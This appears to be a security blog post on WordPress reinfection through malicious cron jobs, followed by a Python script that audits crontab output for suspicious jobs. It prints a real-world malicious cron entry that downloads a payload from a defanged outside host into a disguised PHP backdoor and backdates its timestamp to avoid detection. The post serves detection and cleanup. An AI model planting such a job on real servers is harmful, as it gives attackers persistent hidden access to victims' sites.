
You may remove malware from files and the database, close all security holes, and change all passwords, yet your site still gets reinfected regularly. One possible reason is that you forgot to clean your crontab.

Here's an example of a malicious cron job that creates a backdoor file in the /wp-includes/Text/Diff/Engine directory every other day:


DOWNLOAD_URL="hxxp://cpanel .jawebsolutions .com/u/w.gz"
LOCAL_FILE_PATH="/home/username/public_html/wp-includes/Text/Diff/Engine/i18n.php"
1 3 */2 * * rm -f /var/tmp/w.gz ; wget -q -O /var/tmp/w.gz $DOWNLOAD_URL && \
gunzip -c /var/tmp/w.gz > $LOCAL_FILE_PATH && touch -c -t 201007151834 \
$LOCAL_FILE_PATH && rm -f /var/tmp/w.gz

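The job downloads a gzipped payload to /var/tmp, unpacks it into i18n.php, and then runs touch -c -t 201007151834 to set the file's modification time to July 15, 2010, so the backdoor does not stand out as a recently modified file.

So don't forget to check cron jobs in your hosting control panel, or run the crontab -l command if you have SSH access.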
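One way to automate that review, as an added example that is not part of the original note: a Python function that takes crontab -l output, joins the continued lines, expands crontab variables such as LOCAL_FILE_PATH, and flags jobs that behave like the one above. The function name audit_crontab, the four heuristics, and the benign wp-cron.php line are assumptions made for this example.

```python
import re

# Constructed sample: the job from this note (URL left defanged) plus one benign job.
SAMPLE = r'''DOWNLOAD_URL="hxxp://cpanel .jawebsolutions .com/u/w.gz"
LOCAL_FILE_PATH="/home/username/public_html/wp-includes/Text/Diff/Engine/i18n.php"
1 3 */2 * * rm -f /var/tmp/w.gz ; wget -q -O /var/tmp/w.gz $DOWNLOAD_URL && \
gunzip -c /var/tmp/w.gz > $LOCAL_FILE_PATH && touch -c -t 201007151834 \
$LOCAL_FILE_PATH && rm -f /var/tmp/w.gz
0 2 * * * /usr/bin/php /home/username/public_html/wp-cron.php
'''

# Heuristics (assumptions of this example, not a complete signature set).
CHECKS = {
    "downloads a remote file": r"\b(wget|curl|fetch)\b",
    "writes a .php file via redirection": r">\s*\S+\.php\b",
    "backdates a file timestamp": r"\btouch\b[^;&|]*\s-[a-zA-Z]*[td]\b",
    "stages files in a world-writable temp dir": r"(/var/tmp|/tmp|/dev/shm)/",
}
ASSIGN = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$")
VAR = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")

def audit_crontab(text):
    """Return [(expanded_command, [reasons])] for jobs matching any check."""
    env, findings = {}, []
    # Join backslash-continued lines, as the job is displayed in the note.
    logical = re.sub(r"\\\n", "", text).splitlines()
    for line in logical:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = ASSIGN.match(line)
        if m:  # crontab environment setting, e.g. NAME="value"
            env[m.group(1)] = m.group(2).strip("\"'")
            continue
        # Skip the schedule: an "@daily"-style nickname or five time fields.
        parts = line.split(None, 1 if line.startswith("@") else 5)
        command = parts[-1]
        # Expand variables so paths hidden in assignments become visible.
        expanded = VAR.sub(lambda v: env.get(v.group(1), v.group(0)), command)
        reasons = [why for why, rx in CHECKS.items() if re.search(rx, expanded)]
        if reasons:
            findings.append((expanded, reasons))
    return findings

if __name__ == "__main__":
    for cmd, reasons in audit_crontab(SAMPLE):
        print(cmd, "\n  ->", "; ".join(reasons))
```

Without the variable expansion step, the redirection into i18n.php would be hidden behind $LOCAL_FILE_PATH and the second check would miss it.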
